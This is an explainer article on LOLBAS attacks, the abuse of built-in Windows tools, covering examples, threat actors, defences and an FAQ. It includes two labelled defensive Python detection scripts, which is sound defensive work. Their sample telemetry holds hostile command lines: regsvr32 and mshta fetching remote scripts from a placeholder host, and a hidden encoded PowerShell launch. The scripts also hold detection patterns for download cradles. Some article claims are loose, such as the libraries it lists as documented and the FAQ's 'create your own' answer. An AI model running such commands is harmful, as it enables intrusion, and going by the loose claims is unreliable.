What is LOLBAS (Living Off The Land Binaries And Scripts)?

The acronym LOLBAS stands for a method that misuses programs already present on a computer, for example components of the operating system, for malicious purposes, typically on behalf of malware. The LOLBAS project collects information about binaries, scripts, and libraries that can be misused in this way and makes it publicly available on the Internet. Defending computers against such attacks can be difficult.

LOLBAS is the abbreviation for “Living Off The Land Binaries And Scripts” and stands for a method of attacking computers. “Living Off The Land” literally means living off what the land itself provides, which describes the method quite well. Living Off The Land Binaries And Scripts are executable files, scripts, or libraries that already exist on a computer, are provided by the operating system itself, or come from trusted sources.

They can be misused for certain malicious functions. Malware code uses the resources “naturally” present on a computer, such as programs signed by a vendor or by the operating system.

The term “Living Off The Land” was coined by Christopher Campbell and Matt Graeber. The malicious activities often go undetected because of the LOL concept, as the executing programs are regular pre-installed system tools and applications. For example, Living Off The Land Binaries And Scripts can be used to download files, compile program code, perform file operations, or steal credentials without being detected. On Windows systems, for example, powershell.exe or rundll32.exe are often misused.

The LOLBAS project, initiated by Oddvar Moe, is published on the Internet. It provides information about binaries, scripts, and libraries that can be used, for example, by a Red team as part of penetration tests.

The goal of the open-source project is to document all scripts, binaries, and libraries that can be used for the Living-Off-The-Land method. If certain binaries, scripts, or libraries meet the project’s requirements, the information is published on the Internet. A searchable list of LOLBins, LOLLibs, and LOLScripts is available. The project can be accessed via the link https://lolbas-project.github.io.

Criteria for LOLBAS scripts, libraries, and binaries

To be considered relevant to the Living Off The Land Binaries And Scripts project, the scripts, libraries, or binaries must be present on the system by default or installable through trusted software vendors or open-source sources. In addition, they must provide unexpected functions that can be repurposed for attack purposes. Such functions include:

  • Executing program code or scripts
  • Compiling program code
  • Bypassing user account control
  • Reading network traffic or user activity
  • Side-loading or hijacking DLLs
  • Process memory dumping
  • Reading login credentials
  • File operations like file downloads and uploads

How Does LOLBAS Work?

LOLBAS attacks work by using legitimate Windows binaries and scripts to carry out malicious activities. These tools are often already present on the victim’s computer and can be used by attackers to evade detection by security software.

For example, an attacker may use a LOLBAS technique to run a PowerShell script that is already present on the system to download and execute additional malicious code. Since PowerShell is a legitimate tool used by system administrators, it may not be flagged as suspicious by security software.

Similarly, the attacker could use a legitimate system tool like “wmic.exe” or “regsvr32.exe” to execute malicious code or to bypass security controls.

LOLBAS attacks are often used in conjunction with other techniques, such as social engineering or phishing, to gain initial access to the victim’s computer. Once the attacker has a foothold on the system, they can use LOLBAS techniques to escalate privileges, move laterally through the network, and carry out their malicious objectives.

Defending against LOLBAS attacks requires a multi-layered approach that includes strong access controls, regular system updates and patches, security awareness training for users, and the use of advanced security software that can detect and block suspicious activity.

Protection against LOLBAS attacks

Protection against LOLBAS attacks is difficult. Because the executing programs are tools internal to the operating system or software from trusted sources, the malicious actions often go undetected by standard antivirus and antimalware programs. Special precautions must be taken for protection. In some cases, these must be implemented by the operating system or by the software manufacturers themselves.

In addition, advanced, intelligent protection solutions can be used that monitor the system at several different points. For example, network traffic and the behavior of various processes are continuously monitored to identify anomalies.

Effective Ways To Prevent LOLBAS Attacks

Preventing LOLBAS attacks requires a multi-layered approach that includes both technical and non-technical measures. Here are some effective ways to prevent LOLBAS attacks:

  • Patch and update systems regularly: Keeping software and operating systems up to date can prevent attackers from exploiting known vulnerabilities in these systems.
  • Implement access controls: Limiting access to critical systems and sensitive data can prevent attackers from using LOLBAS techniques to escalate privileges or move laterally through the network.
  • Use advanced security software: Deploying security software that can detect and block suspicious activity, including the misuse of legitimate tools and binaries, can help prevent LOLBAS attacks.
  • Use security awareness training: Educating users about the risks of phishing, social engineering, and other common attack techniques can help prevent initial access to the system.
  • Monitor system activity: Regularly monitoring system activity for signs of suspicious activity can help detect and prevent LOLBAS attacks.
  • Implement a least-privilege policy: Restricting user privileges to only the necessary functions and tasks can prevent attackers from exploiting higher-level privileges.
  • Implement application whitelisting: Limiting the use of system tools and binaries to only those that are necessary for business purposes can prevent attackers from using them for malicious activities.

By implementing these measures, organizations can significantly reduce the risk of LOLBAS attacks and improve their overall security posture. It’s important to note that no single measure can completely prevent attacks, and a multi-layered approach is necessary for effective defense.

What Are Living Off the Land (LOTL) Attacks?

Living off the land (LOTL) attacks refer to a type of cyberattack that uses legitimate tools and software already present on a victim’s computer to carry out malicious activities. Attackers use these tools and software to evade detection by security software, which may not flag them as suspicious because they are legitimate.

Living off the land attacks are often used in combination with other attack techniques, such as phishing or social engineering, to gain initial access to the victim’s system. Once the attacker has gained a foothold on the system, they can use LOTL techniques to escalate privileges, move laterally through the network, and carry out their malicious objectives.


Living off the land attacks can take many forms, including:

  • Use of legitimate system tools like PowerShell, WMI, and regsvr32.exe to execute malicious code.
  • Exploitation of legitimate applications, such as web browsers or Microsoft Office, to deliver malware.
  • Use of administrative tools like PsExec or remote desktop services to gain remote access to systems.
  • Use of scripting languages like VBScript or JavaScript to execute malicious code.
  • Use of legitimate cloud services like Dropbox or Google Drive to store and distribute malware.

Preventing LOTL attacks requires a multi-layered approach that includes strong access controls, regular system updates and patches, security awareness training for users, and the use of advanced security software that can detect and block suspicious activity.

By implementing these measures, organizations can significantly reduce the risk of Living off the land attacks and improve their overall security posture.

Examples of specific LOLBins, LOLLibs, and LOLScripts that have been documented by the LOLBAS project

The LOLBAS (Living Off The Land Binaries And Scripts) project is a community-driven initiative that aims to document various legitimate binaries, libraries, and scripts that can be used by attackers to evade detection and execute malicious actions on a compromised system. Here are some examples of specific LOLBins, LOLLibs, and LOLScripts that have been documented by the project:

LOLBins

  • regsvr32.exe: a legitimate binary used to register COM DLLs, but can be abused to execute arbitrary code by passing a malicious DLL as an argument.
  • schtasks.exe: a legitimate binary used to schedule tasks, but can be abused to execute arbitrary commands with SYSTEM privileges.
  • wmic.exe: a legitimate binary used to manage system settings and services, but can be abused to execute arbitrary commands remotely and exfiltrate data.

LOLLibs

  • mshtml.dll: a legitimate library used by Internet Explorer, but can be abused to execute arbitrary code by crafting HTML and JavaScript payloads.
  • clr.dll: a legitimate library used by .NET applications, but can be abused to execute arbitrary code by loading a malicious .NET assembly.

LOLScripts

  • PowerShell: a legitimate scripting language used by system administrators, but can be abused to execute arbitrary code and download and execute malicious payloads.
  • VBScript: a legitimate scripting language used by system administrators, but can be abused to execute arbitrary code and download and execute malicious payloads.
  • JavaScript: a legitimate scripting language used by web browsers, but can be abused to execute arbitrary code and perform various malicious actions.

It’s worth noting that these are just a few examples, and there are many other LOLBins, LOLLibs, and LOLScripts documented by the LOLBAS project.

Real-world instances of LOLBAS attacks and their consequences

There have been several real-world instances of attackers using LOLBAS techniques to carry out attacks and evade detection. Here are a few examples:

  • APT32 (OceanLotus): In 2019, this Vietnamese APT group was found to be using LOLBins and LOLScripts to evade detection. They used various built-in Windows tools like BITSAdmin, regsvr32, and PowerShell to download and execute malicious payloads, exfiltrate data, and perform other malicious actions on the victim’s systems.
  • DarkHotel: This advanced persistent threat group has been using LOLBins and LOLScripts since at least 2014. They have used built-in Windows tools like PowerShell, wmic, and netsh to download and execute malicious payloads, exfiltrate data, and perform other malicious actions on the victim’s systems.
  • FIN7: This financially motivated cybercrime group has been using LOLBins and LOLScripts since at least 2016. They have used built-in Windows tools like regsvr32, schtasks, and wmic to download and execute malicious payloads, exfiltrate data, and perform other malicious actions on the victim’s systems. They have also used LOLLibs like mshtml.dll to execute arbitrary code.

In all these cases, the use of LOLBAS techniques allowed the attackers to evade detection and carry out their attacks successfully. The consequences of these attacks can be severe, ranging from theft of sensitive data to disruption of critical systems and services. As such, it is important for organizations to be aware of these techniques and take appropriate measures to protect their systems and networks.


This includes implementing strong security controls, monitoring for suspicious activity, and training employees to recognize and respond to potential threats.

The difference between LOLBins and LOLScripts and their specific functions in an attack

LOLBins and LOLScripts are both techniques used by attackers to execute malicious actions on a victim’s system. However, they differ in their implementation and the types of tools used.

  • LOLBins refer to legitimate binaries or executables that are already present on the target system. These are tools that are built into the operating system or are commonly installed applications that are meant to perform legitimate functions. Attackers use LOLBins to avoid detection by security tools that may be monitoring for suspicious activity.
    By using a legitimate tool, the attacker can blend in with normal system activity and avoid raising alarms. To make use of a LOLBin, the attacker will often modify the arguments or parameters passed to the tool, or supply it with a malicious file or payload to execute. Some examples of commonly used LOLBins include regsvr32, wmic, and schtasks.
  • LOLScripts, on the other hand, are scripts or interpreted code that are written in scripting languages like PowerShell, VBScript, or Python. Like LOLBins, LOLScripts are also used by attackers to evade detection by security tools, but they provide more flexibility and control over the actions that are performed on the target system.
    LOLScripts can be used to execute a wide range of malicious actions, such as downloading and executing malicious payloads, modifying system settings, exfiltrating data, and more. To make use of a LOLScript, the attacker will typically write or modify a script to perform the desired actions, and then execute it on the target system.

While both LOLBins and LOLScripts are used to evade detection, LOLBins rely on modifying the arguments passed to legitimate tools to execute malicious code, while LOLScripts use interpreted code to perform a wider range of malicious actions.

How to identify LOLBAS techniques in network traffic and system logs

Identifying LOLBAS techniques in network traffic and system logs can be challenging, as these techniques often rely on legitimate tools and techniques that may not be immediately obvious as malicious. However, there are some indicators that can help identify suspicious activity that may be associated with LOLBAS techniques. Here are a few examples:

  • Network traffic: Look for network traffic that is associated with commonly used LOLBins or LOLScripts, such as wmic, schtasks, or PowerShell. This could include traffic to suspicious IP addresses or domains, or unusual traffic patterns that suggest data exfiltration or command and control (C2) communication.
  • Process monitoring: Keep an eye on process monitoring tools, such as Process Monitor, to identify any unusual behavior from commonly used LOLBins or LOLScripts. This could include unusual arguments or parameters passed to the tool, or attempts to access or modify system files or settings.
  • Logging: Enable logging on critical systems and applications, and monitor the logs for suspicious activity. This could include attempts to execute known LOLBins or LOLScripts, unusual user or application behavior, or attempts to access or modify sensitive data or settings.
  • Behavioral analysis: Use behavioral analysis tools, such as endpoint detection and response (EDR) systems, to identify suspicious behavior on endpoints. This could include attempts to execute unusual commands or scripts, or unusual network activity from a particular endpoint.
  • Threat intelligence: Keep up to date with the latest threat intelligence, such as indicators of compromise (IOCs) and known attack patterns associated with LOLBAS techniques. This can help identify suspicious activity that may be associated with known threats.

Identifying LOLBAS techniques requires a combination of technical expertise, threat intelligence, and proactive monitoring of network and system activity. By leveraging these resources, organizations can better identify and respond to potential threats associated with LOLBAS techniques.
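The "Logging" and "Process monitoring" points above come down to one concrete check: when a known LOLBin starts, does its command line match a documented abuse pattern (certutil fetching or decoding a file, regsvr32 loading code from a URL argument, mshta running script, PowerShell with an encoded or download-and-execute command line)? The following is an added example, not code from the page or from the LOLBAS project. It runs a small watchlist over constructed Sysmon-style process-creation events; the JSON field names (host, user, parent, image, cmdline), the placeholder domain lolbin-test.invalid and the placeholder base64 string are assumptions of this example.

```python
"""Signature-style detection of LOLBin abuse in process-creation telemetry.

Events are constructed, Sysmon-like JSON lines; the field names are this
example's own choice, not a schema defined by the LOLBAS project.
"""
import json
import re
from dataclasses import dataclass
from typing import Iterable

# Abuse patterns per LOLBin, mirroring the behaviours described on the page.
# Tune (and allow-list known administrative usage) before running on real data.
WATCHLIST = {
    "certutil.exe": [
        (r"-urlcache\b", "certutil fetching a remote file"),
        (r"-decode\b", "certutil decoding a file"),
    ],
    "regsvr32.exe": [
        (r"/i:\s*https?://", "regsvr32 loading code from a URL argument"),
    ],
    "mshta.exe": [
        (r"https?://", "mshta executing a remote HTA"),
        (r"\b(javascript|vbscript):", "mshta running inline script"),
    ],
    "rundll32.exe": [
        (r"\bjavascript:", "rundll32 running inline JavaScript"),
    ],
    "powershell.exe": [
        (r"\s-(e|ec|enc|encodedcommand)\b", "encoded PowerShell command line"),
        (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b",
         "PowerShell download cradle"),
    ],
}
COMPILED = {img: [(re.compile(p, re.I), why) for p, why in rules]
            for img, rules in WATCHLIST.items()}


@dataclass(frozen=True)
class Alert:
    host: str
    user: str
    image: str
    reason: str
    cmdline: str


def image_name(path: str) -> str:
    """Basename of a Windows or POSIX path, lower-cased for matching."""
    return re.split(r"[\\/]", path)[-1].lower()


def scan_events(lines: Iterable[str]) -> list[Alert]:
    """One Alert per (event, matched pattern); benign use of a LOLBin yields none."""
    alerts: list[Alert] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        image = image_name(ev["image"])
        for pattern, reason in COMPILED.get(image, []):
            if pattern.search(ev["cmdline"]):
                alerts.append(Alert(ev["host"], ev["user"], image, reason, ev["cmdline"]))
    return alerts


def summarize(alerts: list[Alert]) -> dict[str, int]:
    """Alerts per LOLBin, the first view a SOC dashboard would show."""
    counts: dict[str, int] = {}
    for a in alerts:
        counts[a.image] = counts.get(a.image, 0) + 1
    return counts


# Constructed sample telemetry: two benign LOLBin uses (certutil hashing a file,
# an admin running a backup script) and three matches. The -Enc value is a
# placeholder (UTF-16LE "ABC123"), not a real payload.
SAMPLE_EVENTS = r"""
{"host":"ws01","user":"CORP\\alice","parent":"explorer.exe","image":"C:\\Windows\\System32\\notepad.exe","cmdline":"notepad.exe report.txt"}
{"host":"ws01","user":"CORP\\alice","parent":"cmd.exe","image":"C:\\Windows\\System32\\certutil.exe","cmdline":"certutil.exe -hashfile installer.iso SHA256"}
{"host":"ws02","user":"CORP\\bob","parent":"winword.exe","image":"C:\\Windows\\System32\\regsvr32.exe","cmdline":"regsvr32.exe /s /i:http://lolbin-test.invalid/update.sct update.dll"}
{"host":"ws02","user":"CORP\\bob","parent":"explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"}
{"host":"ws03","user":"CORP\\carol","parent":"winword.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmdline":"powershell.exe -NoP -W Hidden -Enc QQBCAEMAMQAyADMA"}
{"host":"ws03","user":"CORP\\carol","parent":"outlook.exe","image":"C:\\Windows\\System32\\mshta.exe","cmdline":"mshta.exe http://lolbin-test.invalid/invoice.hta"}
"""

if __name__ == "__main__":
    found = scan_events(SAMPLE_EVENTS.splitlines())
    for a in found:
        print(f"{a.host} {a.user} {a.image}: {a.reason} :: {a.cmdline}")
    print(summarize(found))
```

Note that the parent field is carried but not used here; a word-processor parent spawning an interpreter is a second, independent signal, and keeping both signals separate makes it easier to see which one fired.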


The history and evolution of LOLBAS attacks and their use in cybercrime

The concept of LOLBins (Living Off the Land Binaries) and LOLScripts (Living Off the Land Scripts) has been around for some time, but the term was popularized by the cybersecurity community in the mid-2010s. The idea behind LOLBAS attacks is to use legitimate tools and commands that are already present on the target system to execute malicious actions, rather than relying on traditional malware that can be detected by security tools.

LOLBAS attacks have become increasingly popular among cybercriminals in recent years, as they allow attackers to evade detection by security tools and blend in with normal system activity. Attackers can use built-in Windows tools like PowerShell, regsvr32, and wmic, as well as commonly installed applications like Microsoft Office and Adobe Reader, to execute malicious payloads and perform other malicious actions on the victim’s system. This makes it more difficult for security tools to detect and prevent the attack.

LOLBAS attacks are often used as part of a larger attack campaign, such as a phishing or spear-phishing attack, to gain initial access to a victim’s system. Once access is gained, the attacker can then use LOLBAS techniques to escalate privileges, move laterally through the network, and exfiltrate sensitive data.

The use of LOLBAS techniques in cybercrime has evolved over time. Initially, attackers focused on using built-in Windows tools to carry out attacks, but more recently, they have begun to use more sophisticated techniques, such as leveraging DLL hijacking vulnerabilities to execute arbitrary code, or using LOLScripts to bypass security controls and install malware on the victim’s system.

As a result of the increasing use of LOLBAS techniques in cybercrime, there has been a growing emphasis on the need for organizations to implement stronger security controls and monitoring mechanisms. This includes regular patching and updating of systems, implementing security tools like endpoint detection and response (EDR) systems and network traffic analysis (NTA) solutions, and providing regular cybersecurity training to employees.

By staying informed about the latest threats and taking proactive measures to mitigate them, organizations can better protect themselves against LOLBAS attacks and other cyber threats.

The role of artificial intelligence and machine learning in detecting and preventing LOLBAS attacks

Artificial intelligence (AI) and machine learning (ML) can play an important role in detecting and preventing LOLBAS attacks. These technologies can be used to identify patterns and anomalies in system and network activity that may be indicative of a LOLBAS attack. Here are a few ways in which AI and ML can be used to detect and prevent LOLBAS attacks:

  • Behavioral analysis: AI and ML algorithms can be trained to analyze normal system and network behavior, and to detect deviations from that behavior that may be indicative of a LOLBAS attack. For example, an algorithm may detect an unusual command being executed, or a file being accessed that has not been accessed before.
  • Predictive analytics: AI and ML algorithms can be used to analyze large volumes of data to identify patterns and trends that may indicate a potential LOLBAS attack. For example, an algorithm may detect a sudden increase in network traffic to a specific IP address or domain, or a large number of requests being made to a specific application.
  • Threat intelligence: AI and ML can be used to analyze threat intelligence feeds and other data sources to identify potential LOLBAS attacks. For example, an algorithm may analyze social media and dark web chatter to detect the use of specific LOLBAS techniques by threat actors.
  • Network traffic analysis: AI and ML can be used to analyze network traffic in real-time, and to identify anomalies that may be indicative of a LOLBAS attack. For example, an algorithm may detect unusual DNS requests or HTTP requests that may be associated with a C2 server.
  • Response automation: AI and ML can be used to automate responses to LOLBAS attacks, such as quarantining a specific endpoint or blocking network traffic to a specific IP address or domain.

AI and ML can be used to detect and prevent LOLBAS attacks by analyzing patterns and anomalies in system and network activity, predicting potential threats, and automating responses to potential threats. By leveraging these technologies, organizations can better protect themselves against LOLBAS attacks and other cyber threats.
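The "Behavioral analysis" point above, learning what normal looks like and flagging deviations, can be shown in its simplest form without a full ML pipeline: a frequency baseline of which parent process spawns which child, learned during a quiet period, with unseen parent/child pairs involving interpreters and other LOLBins scored as anomalies. This is an added example, not code from the page or from any vendor product; the event shape (parent, image pairs), the LOLBIN_CHILDREN set and the scoring function are this example's own assumptions, and the baseline events are constructed.

```python
"""Baseline-driven anomaly scoring of parent/child process pairs.

The baseline is a plain frequency table learned from constructed events; it is
the minimal form of the behavioural modelling an EDR or ML system performs.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Children worth scoring: interpreters and LOLBins that rarely have a legitimate
# reason to be spawned by an Office or mail client. This set is an assumption.
LOLBIN_CHILDREN = {
    "powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe",
    "regsvr32.exe", "rundll32.exe", "certutil.exe", "wmic.exe", "schtasks.exe",
}


def proc_name(path: str) -> str:
    """Basename of a Windows or POSIX path, lower-cased."""
    return re.split(r"[\\/]", path)[-1].lower()


@dataclass(frozen=True)
class Finding:
    parent: str
    child: str
    score: float
    seen_before: int


class ProcessBaseline:
    """Counts how often each parent spawned each child during a learning window."""

    def __init__(self) -> None:
        self.pairs: Counter = Counter()

    def learn(self, events) -> None:
        for parent, image in events:
            self.pairs[(proc_name(parent), proc_name(image))] += 1

    def score(self, parent: str, image: str) -> float:
        """1.0 for a never-seen pair, decaying toward 0 the more often it was seen."""
        seen = self.pairs[(proc_name(parent), proc_name(image))]
        return 1.0 / (1 + seen)

    def detect(self, events, threshold: float = 0.5) -> list[Finding]:
        """Flag in-scope children whose parent/child pair is new or nearly new.
        With the default threshold a pair seen once in the baseline still fires."""
        findings: list[Finding] = []
        for parent, image in events:
            child = proc_name(image)
            if child not in LOLBIN_CHILDREN:
                continue  # unseen but out-of-scope pairs (e.g. explorer -> calc) are ignored
            s = self.score(parent, image)
            if s >= threshold:
                seen = self.pairs[(proc_name(parent), child)]
                findings.append(Finding(proc_name(parent), child, s, seen))
        return findings


def repeated(pair, n):
    return [pair] * n


# Constructed learning window: what a typical workstation looked like for a week.
BASELINE_EVENTS = (
    repeated(("explorer.exe", "winword.exe"), 40)
    + repeated(("explorer.exe", "outlook.exe"), 35)
    + repeated(("explorer.exe", "powershell.exe"), 6)   # admins on this host do use it
    + repeated(("services.exe", "svchost.exe"), 120)
    + repeated(("svchost.exe", "rundll32.exe"), 30)
    + repeated(("cmd.exe", "certutil.exe"), 2)
)

# Constructed events to score after learning.
NEW_EVENTS = [
    ("explorer.exe", "powershell.exe"),   # seen 6x   -> 1/7, below threshold
    ("winword.exe", "powershell.exe"),    # never seen -> 1.0, flagged
    ("outlook.exe", "mshta.exe"),         # never seen -> 1.0, flagged
    ("explorer.exe", "calc.exe"),         # never seen but not in scope
    ("svchost.exe", "rundll32.exe"),      # seen 30x  -> 1/31
    ("cmd.exe", "certutil.exe"),          # seen 2x   -> 1/3, below threshold
]

if __name__ == "__main__":
    baseline = ProcessBaseline()
    baseline.learn(BASELINE_EVENTS)
    for f in baseline.detect(NEW_EVENTS):
        print(f"{f.parent} -> {f.child}: score={f.score:.2f} seen_before={f.seen_before}")
```

The frequency table is deliberately per-host in spirit: the same pair (explorer spawning PowerShell) is normal on an administrator's workstation and anomalous on a receptionist's, so a baseline learned across the whole fleet would either miss the latter or drown the SOC in alerts for the former.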

The ethical implications of using LOLBAS techniques in penetration testing and security research

The use of LOLBAS techniques in penetration testing and security research raises several ethical implications that should be carefully considered. Here are a few potential ethical concerns:

  • Unauthorized access: LOLBAS techniques often involve using legitimate tools and commands to carry out malicious actions. In a real-world scenario, this could be considered unauthorized access to a system or network. As such, it is important for penetration testers and security researchers to obtain proper authorization before conducting any testing that involves using LOLBAS techniques.
  • Harm to systems and data: If not executed properly, LOLBAS techniques can cause harm to the target system or network, potentially leading to data loss, system downtime, or other negative consequences. Penetration testers and security researchers should ensure that they fully understand the potential impact of using LOLBAS techniques before conducting any testing.
  • Legal implications: The use of LOLBAS techniques may violate laws and regulations related to computer crime, hacking, and data privacy. Penetration testers and security researchers should ensure that they are familiar with all applicable laws and regulations before conducting any testing that involves using LOLBAS techniques.
  • Informed consent: In some cases, the use of LOLBAS techniques may involve collecting or accessing sensitive data. As such, it is important to obtain informed consent from all parties involved in any testing that involves using LOLBAS techniques.
  • Reputation damage: The use of LOLBAS techniques may lead to negative publicity and damage to the reputation of the organization being tested. As such, it is important for penetration testers and security researchers to conduct testing in a professional and ethical manner, and to communicate with the organization being tested to minimize the risk of negative consequences.

The use of LOLBAS techniques in penetration testing and security research raises several ethical implications related to unauthorized access, potential harm to systems and data, legal implications, informed consent, and reputation damage. Penetration testers and security researchers should carefully consider these implications before using LOLBAS techniques, and should ensure that they conduct testing in a professional and ethical manner.

The potential impact of LOLBAS attacks on critical infrastructure and national security

LOLBAS attacks have the potential to cause significant harm to critical infrastructure and national security. Here are a few potential impacts:

  • Disruption of essential services: LOLBAS attacks could be used to disrupt essential services such as power, water, and transportation systems, causing widespread disruptions and potentially leading to public safety concerns.
  • Data theft or destruction: LOLBAS attacks could be used to steal or destroy sensitive data, potentially compromising national security or exposing confidential information.
  • Economic damage: Disruptions caused by LOLBAS attacks could have a significant impact on the economy, particularly if they affect key industries such as finance, energy, or transportation.
  • Public safety concerns: LOLBAS attacks could create public safety concerns if they affect critical infrastructure or other essential services. For example, if a LOLBAS attack caused a power outage in a hospital, it could lead to serious consequences for patients.
  • Cyber espionage: LOLBAS attacks could be used for cyber espionage, allowing threat actors to gain access to sensitive government or military information.

Given the potential impact of LOLBAS attacks on critical infrastructure and national security, it is essential for organizations and governments to take appropriate measures to prevent and detect these types of attacks. This may include implementing advanced security measures, training personnel on best practices for cybersecurity, and developing effective incident response plans.


Additionally, collaboration between public and private sector entities can help to enhance cybersecurity and mitigate the risk of LOLBAS attacks.

LOLBAS – Frequently Asked Questions

What is a LOLBin? What is an example of a LOLBin?

LOLBins, or Living Off The Land Binaries, refer to legitimate system binaries or executables that can be used by attackers to perform malicious actions on a compromised system. These binaries are often present on a system by default and are trusted by security software, making them an attractive option for attackers to evade detection.

Examples of LOLBins include utilities like PowerShell, Regsvr32, and WMIC. Attackers can use these tools to execute malicious code, download and execute additional payloads, or move laterally within a network.

What are the most used LOLBins?

Some of the most commonly used LOLBins include:

  • PowerShell – a command-line shell and scripting language that is used for system administration tasks but can also be used to execute malicious scripts or commands.
  • Certutil – a built-in Windows tool that is used to manage certificates, but can also be used to download and decode files from the internet.
  • Regsvr32 – a Windows utility used to register and unregister DLL files, but can also be used to execute malicious code.
  • Mshta – a Microsoft HTML Application Host that can be used to execute JavaScript and VBScript code.

It is important to note that LOLBins themselves are not malicious, and many legitimate administrators and security researchers use these tools for system administration and testing purposes.

However, attackers can abuse these tools to carry out malicious activities, and security professionals should be aware of these techniques to detect and mitigate potential threats.

What is the difference between LOLBAS and malware?

LOLBAS (Living Off The Land Binaries and Scripts) and malware are different in several ways. Malware is typically designed and used for malicious purposes, whereas LOLBAS refers to legitimate system binaries or scripts that can be used by both attackers and defenders.

LOLBAS can be used by attackers to evade detection and carry out malicious activities, but they can also be used by defenders for system administration and security testing purposes.

How can LOLBAS be used for good?

LOLBAS can be used for good when they are used by system administrators or security professionals for legitimate purposes, such as system administration tasks or penetration testing. By using these tools, administrators and professionals can improve the security posture of their systems and identify potential vulnerabilities.

How can LOLBAS be used for evil?

On the other hand, LOLBAS can be used for evil when they are used by attackers to carry out malicious activities, such as stealing data, executing code, or moving laterally within a network. Attackers can use these tools to evade detection and bypass security controls, making it more difficult for defenders to detect and respond to attacks.

How can I create my own LOLBAS?

Creating your own LOLBAS requires a deep understanding of system administration and programming. To create a LOLBAS, you would need to identify a legitimate system binary or script that can be used for your desired purpose and modify it to execute your own code. However, it is important to note that creating and using LOLBAS for malicious purposes is illegal and can result in criminal charges.

What are some of the best LOLBAS tools?

Some popular LOLBAS tools include PowerShell, WMIC, Regsvr32, and BITSAdmin. These tools are commonly used by attackers to carry out various malicious activities on a compromised system.

What are some of the best LOLBAS techniques?

Some of the best LOLBAS techniques include using fileless malware, leveraging legitimate system binaries or scripts, and using remote command execution tools like PsExec or WinRM. These techniques can help attackers evade detection and carry out malicious activities on a compromised system.

How can I learn more about LOLBAS?

To learn more about LOLBAS, you can research and read articles and blogs written by security professionals and researchers. There are also several online courses and training programs available that cover the use of LOLBAS in penetration testing and red teaming.

Are there any LOLBAS resources I can use?

There are several LOLBAS resources available, including repositories on GitHub and other online platforms that contain a wide variety of legitimate system binaries and scripts that can be used for system administration and security testing purposes.

However, it is important to note that some of these resources may contain malicious content, and users should exercise caution when downloading and using these tools.